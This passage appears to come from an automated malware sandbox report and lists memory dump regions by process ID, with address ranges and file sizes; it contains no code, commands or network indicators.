              • memory/1252-295-0x0000000000000000-mapping.dmp
              • memory/1372-198-0x00000000064B0000-0x00000000064B1000-memory.dmp
                Filesize

                4KB

              • memory/1372-195-0x0000000006480000-0x0000000006481000-memory.dmp
                Filesize

                4KB

              • memory/1372-232-0x00000000066A0000-0x00000000066A1000-memory.dmp
                Filesize

                4KB

              • memory/1372-35-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/1372-231-0x0000000006690000-0x0000000006691000-memory.dmp
                Filesize

                4KB

              • memory/1372-23-0x0000000000000000-mapping.dmp
              • memory/1528-0-0x0000000000000000-mapping.dmp
              • memory/1572-293-0x0000000000000000-mapping.dmp
              • memory/1580-323-0x0000000000000000-mapping.dmp
              • memory/1584-185-0x0000000006580000-0x0000000006581000-memory.dmp
                Filesize

                4KB

              • memory/1584-16-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/1584-50-0x0000000002660000-0x0000000002661000-memory.dmp
                Filesize

                4KB

              • memory/1584-36-0x0000000000BC0000-0x0000000000BC1000-memory.dmp
                Filesize

                4KB

              • memory/1584-12-0x0000000000000000-mapping.dmp
              • memory/1596-15-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/1596-64-0x00000000057A0000-0x00000000057A1000-memory.dmp
                Filesize

                4KB

              • memory/1596-77-0x00000000063D0000-0x00000000063D1000-memory.dmp
                Filesize

                4KB

              • memory/1596-84-0x0000000006400000-0x0000000006401000-memory.dmp
                Filesize

                4KB

              • memory/1596-13-0x0000000000000000-mapping.dmp
              • memory/1596-69-0x0000000006250000-0x0000000006251000-memory.dmp
                Filesize

                4KB

              • memory/1596-56-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                Filesize

                4KB

              • memory/1596-70-0x00000000062B0000-0x00000000062B1000-memory.dmp
                Filesize

                4KB

              • memory/1772-32-0x0000000000000000-mapping.dmp
              • memory/1772-41-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/1780-363-0x0000000000000000-mapping.dmp
              • memory/1796-4-0x0000000000000000-mapping.dmp
              • memory/1796-5-0x0000000000000000-mapping.dmp
              • memory/1860-328-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1860-329-0x000000000041A684-mapping.dmp
              • memory/1860-331-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1872-8-0x0000000000000000-mapping.dmp
              • memory/1880-11-0x0000000000000000-mapping.dmp
              • memory/1940-322-0x0000000000000000-mapping.dmp
              • memory/2024-18-0x0000000000000000-mapping.dmp
              • memory/2088-178-0x0000000000417A8B-mapping.dmp
              • memory/2096-182-0x000000000041A684-mapping.dmp
              • memory/2156-399-0x0000000001100000-0x0000000001101000-memory.dmp
                Filesize

                4KB

              • memory/2156-401-0x0000000001350000-0x0000000001351000-memory.dmp
                Filesize

                4KB

              • memory/2156-398-0x0000000072700000-0x0000000072DEE000-memory.dmp
                Filesize

                6.9MB

              • memory/2156-400-0x0000000004BE0000-0x0000000004BE1000-memory.dmp
                Filesize

                4KB

              • memory/2156-402-0x0000000005500000-0x0000000005501000-memory.dmp
                Filesize

                4KB

              • memory/2156-395-0x0000000000000000-mapping.dmp
              • memory/2440-375-0x0000000000000000-mapping.dmp
              • memory/2460-259-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/2460-260-0x000000000043FCC3-mapping.dmp
              • memory/2460-269-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/2500-104-0x0000000000000000-mapping.dmp
              • memory/2508-394-0x00000000004E0000-0x0000000000504000-memory.dmp
                Filesize

                144KB

              • memory/2508-343-0x0000000072700000-0x0000000072DEE000-memory.dmp
                Filesize

                6.9MB

              • memory/2508-396-0x0000000000510000-0x0000000000535000-memory.dmp
                Filesize

                148KB

              • memory/2508-340-0x0000000000000000-mapping.dmp
              • memory/2508-346-0x0000000000240000-0x0000000000241000-memory.dmp
                Filesize

                4KB

              • memory/2508-344-0x0000000001350000-0x0000000001351000-memory.dmp
                Filesize

                4KB

              • memory/2512-531-0x0000000000000000-mapping.dmp
              • memory/2512-577-0x0000000000000000-mapping.dmp
              • memory/2512-469-0x0000000000000000-mapping.dmp
              • memory/2512-571-0x0000000000000000-mapping.dmp
              • memory/2512-569-0x0000000000000000-mapping.dmp
              • memory/2512-567-0x0000000000000000-mapping.dmp
              • memory/2512-565-0x0000000000000000-mapping.dmp
              • memory/2512-563-0x0000000000000000-mapping.dmp
              • memory/2512-501-0x0000000000000000-mapping.dmp
              • memory/2512-561-0x0000000000000000-mapping.dmp
              • memory/2512-559-0x0000000000000000-mapping.dmp
              • memory/2512-499-0x0000000000000000-mapping.dmp
              • memory/2512-557-0x0000000000000000-mapping.dmp
              • memory/2512-497-0x0000000000000000-mapping.dmp
              • memory/2512-495-0x0000000000000000-mapping.dmp
              • memory/2512-555-0x0000000000000000-mapping.dmp
              • memory/2512-553-0x0000000000000000-mapping.dmp
              • memory/2512-493-0x0000000000000000-mapping.dmp
              • memory/2512-491-0x0000000000000000-mapping.dmp
              • memory/2512-551-0x0000000000000000-mapping.dmp
              • memory/2512-489-0x0000000000000000-mapping.dmp
              • memory/2512-487-0x0000000000000000-mapping.dmp
              • memory/2512-485-0x0000000000000000-mapping.dmp
              • memory/2512-483-0x0000000000000000-mapping.dmp
              • memory/2512-481-0x0000000000000000-mapping.dmp
              • memory/2512-479-0x0000000000000000-mapping.dmp
              • memory/2512-477-0x0000000000000000-mapping.dmp
              • memory/2512-527-0x0000000000000000-mapping.dmp
              • memory/2512-549-0x0000000000000000-mapping.dmp
              • memory/2512-475-0x0000000000000000-mapping.dmp
              • memory/2512-473-0x0000000000000000-mapping.dmp
              • memory/2512-471-0x0000000000000000-mapping.dmp
              • memory/2512-529-0x0000000000000000-mapping.dmp
              • memory/2512-505-0x0000000000000000-mapping.dmp
              • memory/2512-547-0x0000000000000000-mapping.dmp
              • memory/2512-525-0x0000000000000000-mapping.dmp
              • memory/2512-545-0x0000000000000000-mapping.dmp
              • memory/2512-533-0x0000000000000000-mapping.dmp
              • memory/2512-535-0x0000000000000000-mapping.dmp
              • memory/2512-523-0x0000000000000000-mapping.dmp
              • memory/2512-521-0x0000000000000000-mapping.dmp
              • memory/2512-575-0x0000000000000000-mapping.dmp
              • memory/2512-519-0x0000000000000000-mapping.dmp
              • memory/2512-537-0x0000000000000000-mapping.dmp
              • memory/2512-517-0x0000000000000000-mapping.dmp
              • memory/2512-573-0x0000000000000000-mapping.dmp
              • memory/2512-515-0x0000000000000000-mapping.dmp
              • memory/2512-579-0x0000000000000000-mapping.dmp
              • memory/2512-513-0x0000000000000000-mapping.dmp
              • memory/2512-511-0x0000000000000000-mapping.dmp
              • memory/2512-503-0x0000000000000000-mapping.dmp
              • memory/2512-509-0x0000000000000000-mapping.dmp
              • memory/2512-507-0x0000000000000000-mapping.dmp
              • memory/2512-539-0x0000000000000000-mapping.dmp
              • memory/2512-541-0x0000000000000000-mapping.dmp
              • memory/2512-543-0x0000000000000000-mapping.dmp
              • memory/2512-406-0x00000000000E0000-0x00000000000E1000-memory.dmp
                Filesize

                4KB

              • memory/2512-407-0x0000000000000000-mapping.dmp
              • memory/2512-408-0x0000000000120000-0x0000000000121000-memory.dmp
                Filesize

                4KB

              • memory/2512-409-0x0000000000000000-mapping.dmp
              • memory/2512-411-0x0000000000000000-mapping.dmp
              • memory/2512-413-0x0000000000000000-mapping.dmp
              • memory/2512-415-0x0000000000000000-mapping.dmp
              • memory/2512-417-0x0000000000000000-mapping.dmp
              • memory/2512-419-0x0000000000000000-mapping.dmp
              • memory/2512-421-0x0000000000000000-mapping.dmp
              • memory/2512-423-0x0000000000000000-mapping.dmp
              • memory/2512-425-0x0000000000000000-mapping.dmp
              • memory/2512-427-0x0000000000000000-mapping.dmp
              • memory/2512-429-0x0000000000000000-mapping.dmp
              • memory/2512-431-0x0000000000000000-mapping.dmp
              • memory/2512-433-0x0000000000000000-mapping.dmp
              • memory/2512-435-0x0000000000000000-mapping.dmp
              • memory/2512-437-0x0000000000000000-mapping.dmp
              • memory/2512-439-0x0000000000000000-mapping.dmp
              • memory/2512-441-0x0000000000000000-mapping.dmp
              • memory/2512-443-0x0000000000000000-mapping.dmp
              • memory/2512-445-0x0000000000000000-mapping.dmp
              • memory/2512-447-0x0000000000000000-mapping.dmp
              • memory/2512-449-0x0000000000000000-mapping.dmp
              • memory/2512-451-0x0000000000000000-mapping.dmp
              • memory/2512-453-0x0000000000000000-mapping.dmp
              • memory/2512-455-0x0000000000000000-mapping.dmp
              • memory/2512-457-0x0000000000000000-mapping.dmp
              • memory/2512-459-0x0000000000000000-mapping.dmp
              • memory/2512-461-0x0000000000000000-mapping.dmp
              • memory/2512-463-0x0000000000000000-mapping.dmp
              • memory/2512-465-0x0000000000000000-mapping.dmp
              • memory/2512-467-0x0000000000000000-mapping.dmp
              • memory/2548-137-0x000007FEF6440000-0x000007FEF66BA000-memory.dmp
                Filesize

                2.5MB

              • memory/2556-110-0x0000000000000000-mapping.dmp
              • memory/2564-296-0x0000000000000000-mapping.dmp
              • memory/2584-114-0x0000000000000000-mapping.dmp
              • memory/2640-124-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2640-121-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2640-122-0x000000000043FCC3-mapping.dmp
              • memory/2668-127-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2668-136-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2668-128-0x000000000041A684-mapping.dmp
              • memory/2668-358-0x0000000000000000-mapping.dmp
              • memory/2696-131-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2696-132-0x0000000000417A8B-mapping.dmp
              • memory/2696-134-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2704-370-0x0000000000640000-0x0000000000645000-memory.dmp
                Filesize

                20KB

              • memory/2704-355-0x0000000072700000-0x0000000072DEE000-memory.dmp
                Filesize

                6.9MB

              • memory/2704-352-0x0000000000000000-mapping.dmp
              • memory/2704-362-0x0000000001200000-0x0000000001201000-memory.dmp
                Filesize

                4KB

              • memory/2704-367-0x00000000003B0000-0x00000000003B1000-memory.dmp
                Filesize

                4KB

              • memory/2704-369-0x00000000005C0000-0x00000000005D2000-memory.dmp
                Filesize

                72KB

              • memory/2704-371-0x0000000004B50000-0x0000000004B52000-memory.dmp
                Filesize

                8KB

              • memory/2704-372-0x00000000006E0000-0x00000000006F0000-memory.dmp
                Filesize

                64KB

              • memory/2704-378-0x0000000004B50000-0x0000000004B52000-memory.dmp
                Filesize

                8KB

              • memory/2796-307-0x0000000000000000-mapping.dmp
              • memory/2796-312-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/2796-325-0x0000000000660000-0x0000000000684000-memory.dmp
                Filesize

                144KB

              • memory/2796-315-0x0000000000650000-0x0000000000651000-memory.dmp
                Filesize

                4KB

              • memory/2796-313-0x0000000001250000-0x0000000001251000-memory.dmp
                Filesize

                4KB

              • memory/2836-144-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/2836-155-0x0000000000290000-0x0000000000291000-memory.dmp
                Filesize

                4KB

              • memory/2836-140-0x0000000000000000-mapping.dmp
              • memory/2836-253-0x0000000004960000-0x0000000004A10000-memory.dmp
                Filesize

                704KB

              • memory/2836-256-0x0000000004850000-0x000000000485D000-memory.dmp
                Filesize

                52KB

              • memory/2860-298-0x0000000000870000-0x00000000008C1000-memory.dmp
                Filesize

                324KB

              • memory/2860-264-0x0000000000000000-mapping.dmp
              • memory/2860-266-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/2860-272-0x0000000000200000-0x0000000000201000-memory.dmp
                Filesize

                4KB

              • memory/2860-270-0x0000000000B70000-0x0000000000B71000-memory.dmp
                Filesize

                4KB

              • memory/2872-147-0x0000000000000000-mapping.dmp
              • memory/2880-303-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/2880-311-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/2880-305-0x0000000000417A8B-mapping.dmp
              • memory/2916-361-0x0000000072700000-0x0000000072DEE000-memory.dmp
                Filesize

                6.9MB

              • memory/2916-379-0x0000000000780000-0x0000000000783000-memory.dmp
                Filesize

                12KB

              • memory/2916-357-0x0000000000000000-mapping.dmp
              • memory/2916-365-0x0000000000D10000-0x0000000000D11000-memory.dmp
                Filesize

                4KB

              • memory/2916-368-0x00000000003F0000-0x00000000003F1000-memory.dmp
                Filesize

                4KB

              • memory/2916-377-0x0000000000400000-0x0000000000411000-memory.dmp
                Filesize

                68KB

              • memory/2924-153-0x0000000000000000-mapping.dmp
              • memory/2948-157-0x0000000000000000-mapping.dmp
              • memory/2952-297-0x0000000000000000-mapping.dmp
              • memory/2960-299-0x0000000000000000-mapping.dmp
              • memory/2960-309-0x0000000002650000-0x0000000002654000-memory.dmp
                Filesize

                16KB

              • memory/3000-255-0x0000000000000000-mapping.dmp
              • memory/3000-267-0x0000000002690000-0x0000000002694000-memory.dmp
                Filesize

                16KB

              • memory/3004-169-0x000000000043FCC3-mapping.dmp